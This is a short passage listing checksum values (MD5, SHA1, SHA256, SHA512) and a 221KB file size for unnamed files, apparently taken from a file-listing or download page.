  SHA256: 0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
  SHA512: c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
- Filesize: 221KB
  MD5: 3026bc2448763d5a9862d864b97288ff
  SHA1: 7d93a18713ece2e7b93e453739ffd7ad0c646e9e
  SHA256: 7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
  SHA512: d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6